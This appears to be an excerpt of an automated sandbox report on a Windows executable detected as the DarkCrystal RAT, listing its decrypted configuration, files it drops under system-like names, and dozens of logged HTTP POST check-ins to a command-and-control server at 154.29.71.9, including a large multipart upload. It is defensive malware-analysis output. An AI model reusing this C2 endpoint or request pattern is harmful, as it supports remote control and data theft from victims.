                            Source: 00000000.00000002.1744220158.00000000127A1000.00000004.00000800.00020000.00000000.sdmpString decryptor: ["jlV92PdlAGYlvLQoQswNOvFDvusA9aD0ZFVG44nno5F3WFl92D4cnoFxfSOHgdmjDiMpzJuVFIiTqLqpIsH6fkNv9iklqfGKSf0y35JtSiXeFwGTli8xVqEcUbqRiIpj","9689fee2575b041d566fe4e90198abfbc11de5c33209f1394c6288edd57e1bda","0","","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJeElpd2lJaXdpWlhsSmQwbHFiMmxsTVU1YVZURlNSbFJWVWxOVFZscEdabE01Vm1NeVZubGplVGhwVEVOSmVFbHFiMmxhYlVaell6SlZhVXhEU1hsSmFtOXBXbTFHYzJNeVZXbE1RMGw2U1dwdmFXUklTakZhVTBselNXcFJhVTlwU2pCamJsWnNTV2wzYVU1VFNUWkpibEo1WkZkVmFVeERTVEpKYW05cFpFaEtNVnBUU1hOSmFtTnBUMmxLYlZsWGVIcGFVMGx6U1dwbmFVOXBTakJqYmxac1NXbDNhVTlUU1RaSmJsSjVaRmRWYVV4RFNYaE5RMGsyU1c1U2VXUlhWV2xNUTBsNFRWTkpOa2x1VW5sa1YxVnBURU5KZUUxcFNUWkpibEo1WkZkVmFVeERTWGhOZVVrMlNXNVNlV1JYVldsTVEwbDRUa05KTmtsdVVubGtWMVZwWmxFOVBTSmQiXQ=="]
                            Source: 00000000.00000002.1744220158.00000000127A1000.00000004.00000800.00020000.00000000.sdmpString decryptor: [["http://154.29.71.9/eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/","DbCdn"]]
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeDirectory created: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeDirectory created: C:\Program Files\WindowsPowerShell\Configuration\Registration\27d1bcfc3c54e0Jump to behavior
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\od53iwxz\od53iwxz.pdb source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, 00000000.00000002.1718805809.0000000002EBE000.00000004.00000800.00020000.00000000.sdmp

                            Spreading

                            barindex
                            Infects executable files (exe, dll, sys, html)
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeFile opened: C:\Users\userJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeFile opened: C:\Users\user\AppDataJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeCode function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh0_2_00007FFD9BA4BDED
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeCode function: 4x nop then jmp 00007FFD9B8C1726h49_2_00007FFD9B8C151E
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeCode function: 4x nop then jmp 00007FFD9B8C1726h50_2_00007FFD9B8C151E
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeCode function: 4x nop then jmp 00007FFD9B8A1726h51_2_00007FFD9B8A151E
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeCode function: 4x nop then jmp 00007FFD9B891726h53_2_00007FFD9B89151E

                            Networking

                            barindex
                            Suricata IDS alerts for network traffic
                            Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49731 -> 154.29.71.9:80
                            Uses ping.exe to check the status of other devices and networks
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 384Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 384Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2596Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 1468Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2600Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2600Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2600Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2600Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: multipart/form-data; boundary=----8sMojQO808Z6RTnGrLBFDy69zHfnum3F37User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 139206Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 1856Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2600Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2600Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2600Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2600Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2600Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2600Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 1876Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2600Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2600Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2600Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2600Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2600Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2600Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 1856Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2600Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2600Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2600Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2600Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2600Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2600Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2596Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 1876Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2600Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2600Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2600Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2600Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2600Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2600Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 1864Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2600Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2600Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2600Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2600Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2600Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2596Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 1856Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2596Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2600Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2600Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2600Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 154.29.71.9Content-Length: 2600Expect: 100-continueConnection: Keep-Alive
